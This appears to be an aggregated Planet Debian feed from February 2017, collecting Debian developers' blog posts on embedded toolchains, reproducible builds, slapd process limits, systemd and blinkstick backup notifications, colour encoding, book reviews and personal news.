I'm currently developing an nRF51822-based embedded device. Being one of the Qt/Qt Creator maintainers in Debian, I would of course try to use it for the development. Turns out it works pretty well... with some caveats.

There are already two quite interesting blog posts about using Qt Creator on Mac and on Windows, so I will not repeat the basics, as they are there. Both use qbs, but I managed to use CMake.

Instead, I'll add some tips on the things I needed to solve in order to make this happen on current Debian sid.


  • The required toolchain is already in Debian; just install binutils-arm-none-eabi, gcc-arm-none-eabi and gdb-arm-none-eabi (see the sketch after this list).
  • You will not find arm-none-eabi-gdb-py in the gdb-arm-none-eabi package. Fear not: the provided gdb binary is compiled against python, so it will work.
  • To enable proper debugging, be sure to follow this flag setup. If you are using CMake, as in this example, be sure to modify CMake/toolchain_gcc.cmake as necessary.
  • In Qt Creator you might find that, while trying to run or debug your app, you are greeted with a message box that says "Cannot debug: Local executable is not set." Just go to Projects → Run and change "Run configuration" until you get a valid path (i.e., a path to the .elf or .out file) in the "Executable" field.
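The toolchain bullet above boils down to a single command (a sketch):

sudo apt install binutils-arm-none-eabi gcc-arm-none-eabi gdb-arm-none-eabi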

Cheers!



Enrico Zini: staticsite news: github mode and post series

Wed, 22 Feb 2017 13:10:58 +0000

GitHub mode

Tobias Gruetzmacher implemented GitHub mode for staticsite.

Although GitHub now has a similar site rendering mode, it doesn't give you a live preview: if you run ssite serve on a GitHub project you will get a live preview of README.md and the project documentation.
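A sketch of that preview workflow (the project path is made up; see the staticsite documentation for the exact flags):

cd ~/src/myproject      # a checkout containing README.md and docs
ssite serve             # serve a live preview locally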

Post series

I have added support for post series, which allows you to easily interlink posts with previous/next links.

You can see it in action on links and on An Italian song a day, an ongoing series that is currently posting a link to an Italian song each day.




Jonathan Dowland: Hans Rosling and Steve Hewlett

Wed, 22 Feb 2017 11:13:15 +0000

(image)

I've begun to listen to BBC Radio 4's "More or Less" podcast. They recently had an episode covering the life and work of Hans Rosling, the inspirational Swedish statistician, who has sadly died of pancreatic cancer. It was very moving. Some of Professor Rosling's videos are available to view online. I've heard that they are very much worth watching.

Over the last few months I have also been listening to regular updates by BBC broadcaster Steve Hewlett on his own journey as a cancer sufferer. These were remarkably frank discussions of the ins and outs of his diagnosis, treatment, and the practical consequences on his everyday life. I was very sad to tune in on Monday evening and hear a series of repeated clips from his previous appearances on the PM show, as the implications were clear. And indeed, Steve Hewlett died from oesophageal cancer on Monday. Here's an obituary in the Guardian.




Junichi Uekawa: Trying to use Termux on chromebook.

Wed, 22 Feb 2017 09:42:04 +0000

Trying to use Termux on a chromebook. I am exclusively using a chromebook for my client-side work. Android apps work on this device, and so does Termux. I was pondering how to make things more useful, like using Download directory integration and chrome apps, but I have not quite got things set up. Then I noticed that it's possible to use sshd on Termux. It only accepts public key authentication, but that's enough for me. I can now use my SecureShell chrome app to connect and get things working. Android apps don't support all the keybinds, but SecureShell does, which improves my life a bit.
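The Termux side is only a couple of commands (a sketch; Termux's sshd listens on port 8022 by default, and only key authentication works here):

pkg install openssh            # inside Termux
# put your public key into ~/.ssh/authorized_keys, then:
sshd                           # starts listening on port 8022
ssh -p 8022 localhost          # e.g. from the SecureShell chrome app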




Joey Hess: early spring

Wed, 22 Feb 2017 04:51:11 +0000


Sun is setting after 7 (in the JEST TZ); it's early spring. Batteries are generally staying above 11 volts, so it's time to work on the porch (on warmer days), running the inverter and spinning up disc drives that have been mostly off since fall. Back to leaving the router on overnight so my laptop can sync up before I wake up.

Not enough power yet to run electric lights all evening, and there's still a risk of a cloudy week interrupting the climb back up to plentiful power. It's happened to me a couple times before.

Also, it turned out that both of my laptop's DC-DC power supplies developed partial shorts in their cords around the same time. So at first I thought it was some problem with the batteries or laptop, but eventually I figured it out and got them replaced. (This may have contributed to the cliff earlier; it seemed to be worst when house voltage was low.)

Soon, 6 months of more power than I can use..

Previously: battery bank refresh, late summer, the cliff




Shirish Agarwal: The Indian elections hungama

Tue, 21 Feb 2017 23:11:26 +0000

Before I start, I would like to point out #855549, a normal/wishlist bug I have filed against apt, the command-line package manager. I sincerely believe that having a history command to know what packages were installed, which were upgraded and which were purged should be easily accessible and easily understood, and if the output looks pretty, so much the better. Of particular interest to me is having a list of the new packages I have installed in the last couple of years, after jessie became the stable release. It would probably make for some interesting reading. I don't know how much effort it would take to code something like that, but if it works, it would be the greatest. Apt would have finally arrived. Not that it's a bad tool, it's just that it would then make for a heck of a useful tool.

Coming back to the topic at hand: for the last couple of weeks we haven't had water, or rather water pressure. A water crisis has been hitting Pune every year since 2014 with no end in sight. This has been reported in the newspapers time and again, but it seems to have fallen on deaf ears. The end result is that I have to bring buckets of water from around 50-odd metres away. It's not a big thing; it's not like some women in villages in Rajasthan who have to walk between 200 metres and 5-odd kilometres to get potable water, or Darfur, Western Sudan, where women are often kidnapped and sold as sexual slaves when they go to fetch water. The situation in Darfur has been shown quite vividly in Darfur is Dying (it is possible that I have mentioned Darfur before). While the game is unfortunately a flash-based web resource, the most disturbing part is that it is extremely depressing: there is a no-win scenario. So knowing and seeing both those scenarios, I can't complain about 50 metres. But when you extrapolate the same situation over roughly 3.3-3.4 million citizens (3.1 million in the 2011 census, with a conservative 2.3-2.4 percent population growth rate according to scroll.in), it becomes a serious problem.

Fortunately or unfortunately, Pune Municipal Corporation elections were held today. Fortunately or unfortunately, this time all the political parties brought in largely unknown faces for these elections. For example, I belong to ward 14, which is spread over quite a bit of area and has around 10k registered voters. The unfortunate part of having new faces in elections is that you don't know anything about them. Apart from the affidavits filed, the only things I come to know are whether there are criminal cases filed against them and what they have declared as their wealth. I am, and should be, thankful to ADR, which is the force behind having the collated data made public. There is a lot of untold story about the political push-back by all the major national and regional parties when even this bit of information was to be made public; it took the major part of a decade for such information to come into the public domain. But my goal of getting clean air and a 24×7 water supply to each household seems a very distant dream. I tried to connect with the corporators about a week before the contest, and almost all of the lower party functionaries hid behind their parties' manifestos, stating they would do their best, without any viable plan. For those not knowing, India has been blessed with 6-odd national parties and about 36-odd r[...]
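Coming back to the apt wishlist from the top of this post: until such a history command exists, a rough approximation can be scraped from the logs apt already keeps (a sketch; the greps may need tuning for your setup):

# raw Install:/Upgrade:/Remove: records, including rotated logs
zgrep -h '^Install:' /var/log/apt/history.log*

# or the commands that were actually typed
zgrep -h '^Commandline:' /var/log/apt/history.log*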



Steinar H. Gunderson: 8-bit Y'CbCr ought to be enough for anyone?

Tue, 21 Feb 2017 22:07:00 +0000

If you take a random computer today, it's pretty much a given that it runs a 24-bit mode (8 bits of each of R, G and B); as we moved from palettized displays at some point during the 90s, we quickly went past 15- and 16-bit and settled on 24-bit. The reasons are simple; 8 bits per channel is easy to work with on CPUs, and it's on the verge of what human vision can distinguish, at least if you add some dither. As we've been slowly taking the CPU off the pixel path and replacing it with GPUs (which have specialized hardware for more kinds of pixel formats), changing formats has become easier, and there's some push to 10-bit (30-bit) “deep color” for photo pros, but largely, 8 bits per channel is where we are.

Yet, I'm now spending time adding 10-bit input (and eventually also 10-bit output) to Nageru. Why?

The reason is simple: Y'CbCr. Video traditionally isn't done in RGB, but in Y'CbCr; that is, a black-and-white signal (Y) and then two color-difference signals (Cb and Cr, roughly “additional blueness“ and “additional redness”, respectively). We started doing this because it was convenient in analog TV (if you separate the two, black-and-white TVs can just ignore the color signal), but we kept doing it because it's very nice for reducing bandwidth: Human vision is much less sensitive to color than to brightness, so we can transfer the color channels in lower resolution and get away with it. (Also, a typical Bayer sensor can't deliver full color resolution anyway.) So most cameras and video codecs work in Y'CbCr, not RGB.

Let's look at the implications of using 8-bit Y'CbCr, using a highly simplified model for, well, simplicity. Let's define Y = 1/3 (R + G + B), Cr = R - Y and Cb = B - Y. (The reverse transformation becomes R = Y + Cr, B = Y + Cb and G = 3Y - R - B.) This means that an RGB color such as pure gray ([127, 127, 127]) becomes [127, 0, 0]. All is good, and Y can go from 0 to 255, just like R, G and B can. A pure red ([255, 0, 0]) becomes [85, 170, -85], and a pure blue ([0, 0, 255]) becomes correspondingly [85, -85, 170]. The color-difference values can reach even larger magnitudes; a pure cyan ([0, 255, 255]) becomes [170, -170, 85], for instance. So we need to squeeze values from -170 to +170 into an 8-bit range, losing accuracy.

Even worse, there are valid Y'CbCr triplets that don't correspond to meaningful RGB colors at all. For instance, Y'CbCr [255, 170, 0] would be RGB [425, 85, 255]; R is out of range! And Y'CbCr [85, 0, 170] would be RGB [85, -85, 255], that is, negative green. This isn't a problem for compression, as we can just avoid using those illegal “colors” with no loss of efficiency. But it means that the conversion in itself causes a loss; actually, if you do the maths on the real formulas (using the BT.601 standard), it turns out only 17% of the 24-bit Y'CbCr code words are valid!

In other words, we lose about two and a half bits of data, and our 24 bits of accuracy have been reduced to 21.5. Or, to put it another way: 8-bit Y'CbCr is roughly equivalent to 7-bit RGB.

Thus, pretty much all professional video uses 10-bit Y'CbCr. It's much more annoying to deal with (especially when you've got subsampling!), but if you're using SDI, there's not even any 8-bit version defined, so if you insist on 8-bit, you're taking data you're getting on the wire (whether [...]
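For reference, the toy model above collected in one place (triplets written [Y, Cr, Cb], as in the text):

\begin{aligned}
Y &= \tfrac{1}{3}(R + G + B), & C_r &= R - Y, & C_b &= B - Y, \\
R &= Y + C_r, & B &= Y + C_b, & G &= 3Y - R - B = Y - C_r - C_b.
\end{aligned}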



Reproducible builds folks: Reproducible Builds: week 95 in Stretch cycle

Tue, 21 Feb 2017 18:25:00 +0000

Here's what happened in the Reproducible Builds effort between Sunday February 12 and Saturday February 18 2017:

Upcoming Events

  • The Reproducible Build Zoo will be presented by Vagrant Cascadian at the Embedded Linux Conference in Portland, Oregon, February 22nd.
  • Introduction to Reproducible Builds will be presented by Vagrant Cascadian at Scale15x in Pasadena, California, March 5th.

Toolchain development and fixes

Ximin Luo posted a preliminary spec for BUILD_PATH_PREFIX_MAP, bringing together work and research from previous weeks.

Ximin refactored and consolidated much of our existing documentation on both SOURCE_DATE_EPOCH and BUILD_PATH_PREFIX_MAP into one unified page, Standard Environment Variables, with extended discussion on related solutions and how these all fit into people's ideas of what reproducible builds should look like in the long term. The specific pages for each variable still remain, at Timestamps Proposal and Build Path Proposal, only without content that was previously duplicated on both pages.

Ximin filed #855282 against devscripts for debsign(1) to support buildinfo files, and wrote an initial series of patches for it with some further additions from Guillem Jover.

Packages reviewed and fixed, and bugs filed

Chris Lamb:

  • #854999 filed against moin, and forwarded upstream.
  • #855002 filed against samplv1, and forwarded upstream.
  • #855426 filed against fritzing-parts.
  • #855480 filed against examl.

Reviews of unreproducible packages

35 package reviews have been added, 1 has been updated and 17 have been removed this week, adding to our knowledge about identified issues. 1 issue type has been added: nondeterminism_in_java_classes_generated_by_jxc

Weekly QA work

During our reproducibility testing, the following FTBFS bugs have been detected and reported by: Chris Lamb (2)

diffoscope development

diffoscope 77 was uploaded to unstable by Mattia Rizzolo. It included contributions from:

Chris Lamb:
  • Some fixes to tests and testing config
  • Don't track archive directory locations, a better fix for CVE-2017-0359.
  • Add --exclude option. Closes: #854783

Mattia Rizzolo:
  • Add my key to debian/upstream/signing-key.asc
  • Add CVE-2017-0359 to the changelog of v76

Ximin Luo:
  • When extracting archives, try to keep directory sizes small

strip-nondeterminism development

strip-nondeterminism 0.031-1 was uploaded to unstable by Chris Lamb. It included contributions from:

Chris Lamb:
  • Make the tests less brittle, by not testing for stat(2) blksize and blocks. #854937

strip-nondeterminism 0.031-1~bpo8+1 was uploaded to jessie-backports by Mattia.

tests.reproducible-builds.org

Vagrant Cascadian and Holger Levsen set up two new armhf nodes, p64b and p64c, running on pine64 boards with an arm64 kernel and armhf userland. This introduces kernel variations to armhf. New setup & maintenance jobs were set up too, plus 6 new builder jobs for armhf.

Misc.

This week's edition was written by Ximin Luo & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists. [...]



Jonathan Dowland: Blinkstick and Doom

Tue, 21 Feb 2017 09:20:57 +0000


I recently implemented VGA "porch" flashing support in Chocolate Doom.

Since I'd spent some time playing with a blinkstick on my NAS, I couldn't resist trying it out with Chocolate Doom too. The result:




Arturo Borrero González: About process limits, round 2

Tue, 21 Feb 2017 08:00:00 +0000

I was wrong. After the other blog post, About process limits, some people contacted me with additional data and information. I myself continued to investigate the issue, so I have new facts.

I read again the source code of the slapd daemon, and the picture seems clearer now. A new message appeared in the log files:

[...]
Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024
Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024
Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024
Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024
Feb 20 06:26:03 slapd[18506]: daemon: 1025 beyond descriptor table size 1024
[...]

This message is clearly produced by the daemon itself, and searching for the string leads to this source code, in servers/slapd/daemon.c:

[...]
sfd = SLAP_SOCKNEW( s );

/* make sure descriptor number isn't too great */
if ( sfd >= dtblsize ) {
	Debug( LDAP_DEBUG_ANY,
		"daemon: %ld beyond descriptor table size %ld\n",
		(long) sfd, (long) dtblsize, 0 );
	tcp_close(s);
	ldap_pvt_thread_yield();
	return 0;
}
[...]

In that same file, dtblsize is set to:

[...]
#ifdef HAVE_SYSCONF
	dtblsize = sysconf( _SC_OPEN_MAX );
#elif defined(HAVE_GETDTABLESIZE)
	dtblsize = getdtablesize();
#else /* ! HAVE_SYSCONF && ! HAVE_GETDTABLESIZE */
	dtblsize = FD_SETSIZE;
#endif /* ! HAVE_SYSCONF && ! HAVE_GETDTABLESIZE */
[...]

If you keep pulling the string, the first two options use system limits to know the value, getrlimit(), and the last one uses a fixed value of 4096 (set at build time).

It turns out that this routine, slapd_daemon_init(), is called once, at daemon startup (see the main() function in servers/slapd/main.c). So the daemon is limiting itself to the limit imposed by the system at daemon startup time. That means that our previous approach of setting the limits at runtime was not being read by the slapd daemon.

Let's go back to the previous approach of establishing the process limits by setting them on the user. The common method is to call ulimit in the init.d script (or the systemd service file). One of my concerns with this approach was that slapd runs as a different user, usually openldap. Again, reading the source code:

[...]
if( check == CHECK_NONE && slapd_daemon_init( urls ) != 0 ) {
	rc = 1;
	SERVICE_EXIT( ERROR_SERVICE_SPECIFIC_ERROR, 16 );
	goto stop;
}

#if defined(HAVE_CHROOT)
	if ( sandbox ) {
		if ( chdir( sandbox ) ) {
			perror("chdir");
			rc = 1;
			goto stop;
		}
		if ( chroot( sandbox ) ) {
			perror("chroot");
			rc = 1;
			goto stop;
		}
	}
#endif

#if defined(HAVE_SETUID) && defined(HAVE_SETGID)
	if ( username != NULL || groupname != NULL ) {
		slap_init_user( username, groupname );
	}
#endif
[...]

So the slapd daemon first reads the limits and then changes user to openldap (the slap_init_user() function). We can then assume that if we set the limits for the root user, calling ulimit in the init.d script, the slapd daemon will actually inherit them. This is what is originally suggested in Debian bug #660917. Let's use this solution for now.

Many thanks to John Hughes john@atlantech.com for the clarifications via email. [...]
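A sketch of that solution (the value 8192 is only an example; pick whatever your site needs):

# init.d route: raise the fd limit for root before slapd starts
# and drops privileges to the openldap user
ulimit -n 8192

# systemd route: the equivalent drop-in for the slapd unit,
# e.g. /etc/systemd/system/slapd.service.d/limits.conf:
#   [Service]
#   LimitNOFILE=8192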



Petter Reinholdtsen: Detect OOXML files with undefined behaviour?

Mon, 20 Feb 2017 23:20:00 +0000

I just noticed that the new Norwegian proposal for archiving rules in the government lists ECMA-376 / ISO/IEC 29500 (aka OOXML) as a valid format to put in long term storage. Luckily such files will only be accepted based on pre-approval from the National Archive. Allowing OOXML files to be used for long term storage might seem like a good idea, as long as we forget that there are plenty of ways for a "valid" OOXML document to have content with no defined interpretation in the standard. This led to a question and an idea.

Is there any tool to detect whether an OOXML document depends on such undefined behaviour? It would be useful for the National Archive (and anyone else interested in verifying that a document is well defined) to have such a tool available when considering whether to approve the use of OOXML. I'm aware of the officeotron OOXML validator, but do not know how complete it is, nor whether it will report use of undefined behaviour. Are there other similar tools available? Please send me an email if you know of any.




Ritesh Raj Sarraf: Setting up appliances - the new way

Mon, 20 Feb 2017 18:39:51 +0000

I own a Fitbit Surge. But Fitbit chose to remain exclusive in terms of interoperability, which means that to make any sense out of the data the watch gathers, you need to stick with what Fitbit mandates. Fair enough in today's trends. It is also part of their business model to restrict useful aspects of the report to Premium Membership. Again, fair enough in today's business trends.

But a nice human chose to write a bridge to extract Fitbit data and feed it into Google Fit. The project is written in Python, so you can get it to work on most common computer platforms. I never bothered to package this tool for Debian, because I was never sure when I'd throw away the Fitbit. But until that happens, I decided to use the tool to sync my data to Google Fit. Which led me to requirements.txt.

This project's requirements.txt lists versioned module dependencies, of which many modules in Debian were either older or newer than what was mentioned in the requirements. To get the tool working, I installed it the pip way. Three months later, something broke and I needed to revisit the installed modules. At that point, I realized that there's no such thing as:

pip upgrade

That further led me to dig into why anyone wouldn't add something so simple, because today, in the days of pip, snap, flatpak and docker, distributions are predicted to go obsolete and irrelevant, and users should get the SOURCES directly from the developers. But just looking at the date the bug was filed killed my enthusiasm.

So, without packaging for Debian, and without installing through pip, I was happy that my init has the ability to create confined and containerized environments, something that I could use to get the job done.

rrs@chutzpah:~$ sudo machinectl login fitbit
[sudo] password for rrs:
Connected to machine fitbit. Press ^] three times within 1s to exit session.

Debian GNU/Linux 9 fitbit pts/0

fitbit login: root
Last login: Fri Feb 17 12:44:25 IST 2017 on pts/1

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

root@fitbit:~# tail -n 25 /var/tmp/lxc/fitbit-google.log
synced calories - 1440 data points

------------------------------   2017-02-19  -------------------------
synced steps - 1440 data points
synced distance - 1440 data points
synced heart_rate - 38215 data points
synced weight - 0 logs
synced body_fat - 0 logs
synced calories - 1440 data points

------------------------------   2017-02-20  -------------------------
synced steps - 1270 data points
synced distance - 1270 data points
synced heart_rate - 32547 data points
synced weight - 0 logs
synced body_fat - 0 logs
synced calories - 1271 data points

Synced 7 exercises between : 2017-02-15 -- 2017-02-20

--------------------------------------------------------------------------
Like it ? star the repository : https://github.com/praveendath92/fitbit-googlefit
--------------------------------------------------------------------------
[...]
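As an aside: since there is no 'pip upgrade' subcommand, the closest equivalents I know of are these (a sketch; run inside whatever environment the tool was installed in):

$ pip list --outdated                        # show installed modules with newer releases
$ pip install --upgrade -r requirements.txt  # re-resolve the pinned dependencies

Neither of which replaces a distribution's coherent, tested upgrade path, which was rather the point above.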



Holger Levsen: How to use .ics files like it's 1997

Mon, 20 Feb 2017 17:46:59 +0000

$ sudo apt install khal
…
Unpacking khal (0.8.4-3) ...
…
$ (echo 1;echo 0;echo y;echo 0; echo y; echo n; echo y; echo y)  | khal configure
…
Do you want to write the config to /home/user/.config/khal/khal.conf? (Choosing `No` will abort) [y/N]: Successfully wrote configuration to /home/user/.config/khal/khal.conf
$ wget https://anonscm.debian.org/cgit/debconf-data/dc17.git/plain/misc/until-dc17.ics
…
HTTP request sent, awaiting response... 200 OK
Length: 6120 (6.0K) [text/plain]
Saving to: ‘until-dc17.ics’
…
$ khal import --batch -a private until-dc17.ics
$ khal agenda --days 14
Today:
16:30-17:30: DebConf Weekly Meeting ⟳

27-02-2017
16:30-17:30: DebConf Weekly Meeting ⟳

khal is available in stretch and newer, and is probably best run from cron, piping into '/usr/bin/mail'. Thanks to Gunnar Wolf for figuring it all out.
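For example, a hypothetical crontab entry along those lines (timing and address made up):

# mail yourself the next two weeks of events every morning at 07:00
0 7 * * * khal agenda --days 14 | /usr/bin/mail -s "upcoming events" you@example.com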




Jonathan Dowland: Blinkenlights, part 3

Mon, 20 Feb 2017 16:31:33 +0000


red blinkenlights!

Part three of a series. part 1, part 2.

One morning last week I woke up to find the LED on my NAS a solid red. I've never been happier to have something fail.

I'd set up my backup jobs to fire off a systemd unit on failure:

OnFailure=status-email-user@%n.service

This is a generator service, which is used to fire off an email to me when something goes wrong (I followed these instructions on the Arch wiki to set it up). Once I got the blinkstick, I added an additional command to that service to light up the LED:

ExecStart=-/usr/local/bin/blinkstick --index 1 --limit 50 --set-color red

The actual failure was a simple thing to fix. But I never did get the email.

On further investigation, there are problems with using exim and systemd together in Debian at the moment: it's possible for the exim4 daemon to exit without systemd recognizing that this is a failure, and thus the mail spool never gets processed. This should probably be fixed by the exim4 package providing a proper systemd service unit.




Jonathan Dowland: Blinkenlights, part 2

Mon, 20 Feb 2017 16:31:33 +0000

Part two of a series. part 1, part 3.

To start configuring my NAS to use the new blinkenlights, I thought I'd start with a really easy job: I plug in my iPod, a script runs to back it up, then the iPod gets unmounted. It's one of the simpler jobs to start with because the iPod is a simple block device and there's no encryption in play. For now, I'm also going to assume the LED is going to be used exclusively for this job. In the future I will want many independent jobs to perhaps use the LED to signal things, and figuring out how that will work is going to be much harder.

I'll skip over the journey and go straight to the working solution. I have a systemd job that is used to invoke a sync from the iPod as follows:

[Service]
Type=oneshot
ExecStart=/bin/mount /media/ipod
ExecStart=/usr/local/bin/blinkstick --index 1 --limit 10 --set-color 33c280
ExecStart=/usr/bin/rsync ...
ExecStop=/bin/umount /media/ipod
ExecStop=/usr/local/bin/blinkstick --index 1 --limit 10 --set-color green

[Install]
WantedBy=dev-disk-by\x2duuid-A2EA\x2d96ED.device

[Unit]
OnFailure=blinkstick-fail.service

/media/ipod is a classic mount configured in /etc/fstab. I've done this rather than use the newer systemd .mount units, which sadly don't give you enough hooks for running things after unmount or in the failure case. This feels quite unnatural; much more "systemdy" would be to Requires= the mount unit, but I couldn't figure out an easy way to set the LED to green after the unmount. I'm sure it's possible, but convoluted.

The first blinkstick command sets the LED to a colour to indicate "in progress". I explored some of the blinkstick tool's options for a fading or throbbing colour, but they didn't work very well. I'll take another look in the future. After the LED is set, the backup job itself runs. The last blinkstick command, which is only run if the previous umount has succeeded, sets the LED to indicate "safe to unplug".

The WantedBy here instructs systemd that when the iPod device-unit is activated, it should activate my backup service. I can refer to the iPod device-unit using this name based on the partition's UUID; this is not the canonical device name that you see if you run systemctl, but it's much shorter and, crucially, it's stable: the canonical name depends on exactly where you plugged the device in and what other devices might have been connected at the same time.

If something fails, a second unit blinkstick-fail.service gets activated. This is very short:

[Service]
ExecStart=/usr/local/bin/blinkstick --index 1 --limit 50 --set-color red

This simply sets the LED to red. Again, it's a bit awkward that in two cases I'm setting the LED with a simple Exec but in the third I have to activate a separate systemd service: this seems to be the nature of the beast. At least when I come to look at concurrent jobs all interacting with the LED, the failure case should be simple: red trumps any other activity; the user must go and check what's up. [...]



Russ Allbery: Haul via parents

Mon, 20 Feb 2017 02:39:00 +0000

My parents were cleaning out a bunch of books they didn't want, so I grabbed some of the ones that looked interesting. A rather wide variety of random stuff. Also, a few more snap purchases on the Kindle even though I've not been actually finishing books recently. (I do have two finished and waiting for me to write reviews, at least.) Who knows when, if ever, I'll read these.

Mark Ames — Going Postal (nonfiction)
Catherine Asaro — The Misted Cliffs (sff)
Ambrose Bierce — The Complete Short Stories of Ambrose Bierce (collection)
E. William Brown — Perilous Waif (sff)
Joseph Campbell — The Hero with a Thousand Faces (nonfiction)
Jacqueline Carey — Miranda and Caliban (sff)
Noam Chomsky — 9-11 (nonfiction)
Noam Chomsky — The Common Good (nonfiction)
Robert X. Cringely — Accidental Empires (nonfiction)
Neil Gaiman — American Gods (sff)
Neil Gaiman — Norse Mythology (sff)
Stephen Gillet — World Building (nonfiction)
Donald Harstad — Eleven Days (mystery)
Donald Harstad — Known Dead (mystery)
Donald Harstad — The Big Thaw (mystery)
James Hilton — Lost Horizon (mainstream)
Spencer Johnson — The Precious Present (nonfiction)
Michael Lerner — The Politics of Meaning (nonfiction)
C.S. Lewis — The Joyful Christian (nonfiction)
Grigori Medvedev — The Truth about Chernobyl (nonfiction)
Tom Nadeu — Seven Lean Years (nonfiction)
Barack Obama — The Audacity of Hope (nonfiction)
Ed Regis — Great Mambo Chicken and the Transhuman Condition (nonfiction)
Fred Saberhagen — Berserker: Blue Death (sff)
Al Sarrantonio (ed.) — Redshift (sff anthology)
John Scalzi — Fuzzy Nation (sff)
John Scalzi — The End of All Things (sff)
Kristine Smith — Rules of Conflict (sff)
Henry David Thoreau — Civil Disobedience and Other Essays (nonfiction)
Alan W. Watts — The Book (nonfiction)
Peter Whybrow — A Mood Apart (nonfiction)

I've already read (and reviewed) American Gods, but didn't own a copy of it, and that seemed like a good book to have a copy of.

The Carey and Brown were snap purchases, and I picked up a couple more Scalzi books in a recent sale.




Norbert Preining: Ryu Murakami – Tokyo Decadence

Mon, 20 Feb 2017 02:08:31 +0000

The other Murakami, Ryu Murakami (村上 龍), is hard to compare to the more famous Haruki. His collection of stories reflects the dark sides of Tokyo, far removed from the happy world of AKB48 and the like. Criminals, prostitutes, depression, loss. A bleak image onto a bleak society. This collection of short stories is a consequent deconstruction of happiness, love, everything we believe makes our lives worthwhile. The protagonists are idealistic students losing their faith, office ladies on aberrations, drunkards, movie directors, the usual mixture. But the topic remains constant – the unfulfilled search for happiness and love.

I felt I was beginning to understand what happiness is about. It isn't about guzzling ten or twenty energy drinks a day, barreling down the highway for hours at a time, turning over your paycheck to your wife without even opening the envelope, and trying to force your family to respect you. Happiness is based on secrets and lies. – Ryu Murakami, It all started just about a year and a half ago

A deeply pessimistic undertone echoes through these stories, and the atmosphere and writing remind me of Charles Bukowski. This pessimism resonates in the melancholy of the running theme of the stories, Cuban music. Murakami was active in disseminating Cuban music in Japan, which included founding his own label. Javier Olmo's pieces are often the connecting parts, as well as lending the short stories their titles: Historia de un amor, Se fué.

The belief – that what's missing now used to be available to us – is just an illusion, if you ask me. But the social pressure of "You've got everything you need, what's your problem?" is more powerful than you might ever think, and it's hard to defend yourself against it. In this country it's taboo even to think about looking for something more in life. – Ryu Murakami, Historia de un amor

It is interesting to see that, on the surface, the women in the stories are the broken characters, leading feminists to incredible rants about the book; see the rant^Wreview of Blake Fraina at Goodreads:

I'll start by saying that, as a feminist, I'm deeply suspicious of male writers who obsess over the sex lives of women and, further, have the audacity to write from a female viewpoint… …female characters are pretty much all pathetic victims of the male characters… I wish there was absolutely no market for stuff like this and I particularly discourage women readers from buying it… – Blake Fraina, Goodreads review

At first sight it might look like the female characters are pretty much all pathetic victims of the male characters, but in fact it is the other way round: the desperate characters, the slaves of their own desperation, are the men, not the women, in these stories. It is dual to the situation in Hitomi Kanehara's Snakes and Earrings, where at first sight the tattooist and the outlaw friends are the broken characters, but the really cracked one is the sweet Tokyo girly.

Male-female relationships are always in transition. If there's no f[...]



Gregor Herrmann: RC bugs 2016/52-2017/07

Sun, 19 Feb 2017 22:19:07 +0000

(image)

debian is in deep freeze for the upcoming stretch release. still, I haven't dived into fixing "general" release-critical bugs yet; so far I mostly kept to working on bugs in the debian perl group:

  • #834912 – src:libfile-tee-perl: "libfile-tee-perl: FTBFS randomly (Failed 1/2 test programs)"
    add patch from ntyni (pkg-perl)
  • #845167 – src:lemonldap-ng: "lemonldap-ng: FTBFS randomly (failing tests)"
    upload package prepared by xavier with disabled tests (pkg-perl)
  • #849362 – libstring-diff-perl: "libstring-diff-perl: FTBFS: test failures with new libyaml-perl"
    add patch from ntyni (pkg-perl)
  • #851033 – src:jabref: "jabref: FTBFS: Could not find org.postgresql:postgresql:9.4.1210."
    update maven.rules
  • #851347 – libjson-validator-perl: "libjson-validator-perl: uses deprecated Mojo::Util::slurp, makes libswagger2-perl FTBFS"
    upload new upstream release (pkg-perl)
  • #852853 – src:libwww-curl-perl: "libwww-curl-perl: FTBFS (Cannot find curl.h)"
    add patch for multiarch curl (pkg-perl)
  • #852879 – src:license-reconcile: "license-reconcile: FTBFS: dh_auto_test: perl Build test --verbose 1 returned exit code 255"
    update tests (pkg-perl)
  • #852889 – src:liblatex-driver-perl: "liblatex-driver-perl: FTBFS: Test failures"
    add missing build dependency (pkg-perl)
  • #854859 – lemonldap-ng-doc: "lemonldap-ng-doc: unhandled symlink to directory conversion: /usr/share/doc/lemonldap-ng-doc/pages/documentation/current"
    help with dpkg-maintscript-helper, upload on xavier's behalf (pkg-perl)

thanks to the release team for pro-actively unblocking the packages with fixes which were uploaded after the beginning of the freeze!




Steve Kemp: Apologies for the blog-churn.

Sat, 18 Feb 2017 22:00:00 +0000


I've been tweaking my blog a little over the past few days, getting ready for a new release of the chronicle blog compiler (github).

During the course of that I rewrote all the posts to have 100% lower-case file-paths. Redirection pages have been auto-generated for each page that was previously mixed-case, but unfortunately that meant the RSS feed was updated unnecessarily:

  • If it used to contain:
    • https://example.com/Some_Page.html
  • It would have been updated to contain
    • https://example.com/some_page.html

That triggered a lot of spamming, as the URLs would have shown up as being new/unread/distinct.




Dirk Eddelbuettel: RPushbullet 0.3.1

Sat, 18 Feb 2017 02:17:00 +0000

A new release 0.3.1 of the RPushbullet package, following the recent 0.3.0 release, is now on CRAN. RPushbullet interfaces the neat Pushbullet service for inter-device messaging, communication, and more. It lets you easily send alerts to your browser, phone, tablet, ... -- or all at once.

This release owes once again a lot to Seth Wenchel, who helped to update and extend a number of features. We fixed one more small bug stemming from the RJSONIO to jsonlite transition, and added a few more helpers. We also enabled Travis testing, and with it covr-based coverage analysis, using pretty much the same setup I described in this recent blog post.

Changes in version 0.3.1 (2017-02-17)

  • The target device designation was corrected (#39).
  • Three new (unexported) helper functions test the validity of the api key, device and channel (Seth in #41).
  • The summary method for the pbDevices class was corrected (Seth in #43).
  • New helper functions pbValidateConf, pbGetUser, pbGetChannelInfo were added (Seth in #44 closing #40).
  • New classes pbUser and pbChannelInfo were added (Seth in #44).
  • Travis CI tests (and covr coverage analysis) are now enabled via an encrypted config file (#45).

Courtesy of CRANberries, there is also a diffstat report for this release. More details about the package are at the RPushbullet webpage and the RPushbullet GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.



